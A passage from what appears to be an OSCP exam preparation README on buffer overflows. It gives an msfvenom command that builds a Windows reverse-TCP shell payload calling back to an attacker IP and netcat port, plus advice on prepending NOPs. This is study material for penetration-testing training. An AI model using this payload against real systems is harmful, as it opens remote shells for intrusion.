lunoxdev/OSCP-Preparation-Guide/Buffer Overflow/README.md

 msfvenom -p windows/shell_reverse_tcp LHOST=tun0IP LPORT=NetcatPort EXITFUNC=thread -b "\x00\x0a\x0d" -f python
 ```

+NOTE: Could change if it's a Linux machine

 ### Prepend NOPs

 If an encoder was used (more than likely if bad chars are present, remember to prepend at least 16 NOPs (\\x90) to the payload.